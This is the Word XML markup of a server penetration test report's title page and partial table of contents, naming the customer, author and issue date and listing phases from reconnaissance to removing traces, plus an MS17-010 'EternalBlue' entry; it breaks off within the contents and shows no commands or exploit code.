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A1D60" w14:textId="383C8074" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="0022306B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Server Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F5C869" w14:textId="77777777" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="0022306B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30164A7F" w14:textId="09653160" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="0022306B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer Name: </w:t>
      </w:r>
      <w:r w:rsidR="00995B9D" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA53F3" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="0022306B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199C0C13" w14:textId="2913E767" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="0022306B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>The date of issue of the report:</w:t>
      </w:r>
      <w:r w:rsidR="003C59FC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> 13/06/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43597E50" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="0022306B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E01577A" w14:textId="1F7AD77D" w:rsidR="009A6ABD" w:rsidRPr="0022306B" w:rsidRDefault="009A6ABD" w:rsidP="0022306B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: </w:t>
      </w:r>
      <w:r w:rsidR="003C59FC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nelson Pinder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8626E8" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2D9141" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FB4308" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081EC95F" w14:textId="5A2BD89D" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="006379B2" w:rsidP="006379B2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5820"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06622FF0" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CB9514" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2A0EC8" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5E650F" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1814A5" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AB8F3A" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5430CF" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C9EB79" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18CDBDCE" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C21130" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273247D5" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BEBF7FD" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557640A9" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485318A2" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BE146E" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56517A3F" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BE37F1" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1F738C" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC167DD" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52587049" w14:textId="77777777" w:rsidR="004F5387" w:rsidRPr="0022306B" w:rsidRDefault="004F5387" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31BC9EC4" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDE6312" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F5F1E5" w14:textId="77777777" w:rsidR="0022306B" w:rsidRPr="0022306B" w:rsidRDefault="0022306B" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A075DF" w14:textId="77777777" w:rsidR="0022306B" w:rsidRPr="0022306B" w:rsidRDefault="0022306B" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E01556E" w14:textId="77777777" w:rsidR="0022306B" w:rsidRPr="0022306B" w:rsidRDefault="0022306B" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD091A3" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1932AC79" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F16A65" w14:textId="455EE212" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="004F5387" w:rsidP="004F5387">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00221F7C" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C287B74" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="003B694D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C225177" w14:textId="4C543EE2" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E08CD8" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F2B2EA" w14:textId="76F91187" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B80A8" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64C6A03C" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FE06D9" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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3.1 Phase One: Reconnaissance and Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56597FA2" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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3.2 Phase Two: Vulnerability Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42824AA9" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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3.3 Phase Three: Post-penetration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7702F3" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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 xml:space="preserve">3.4 Phase Four: Maintain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
        <w:t>Persistance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FB8D7AE" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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3.5 Stage Five: Removing Traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5506EA" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3136F8EA" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Vulnerability Analysis and CVSS Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F80685" w14:textId="77777777" w:rsidR="00221F7C" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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4.1 Critical Vulnerability: MS17-010 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-NZ"/>
        </w:rPr>
        <w:t>Eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
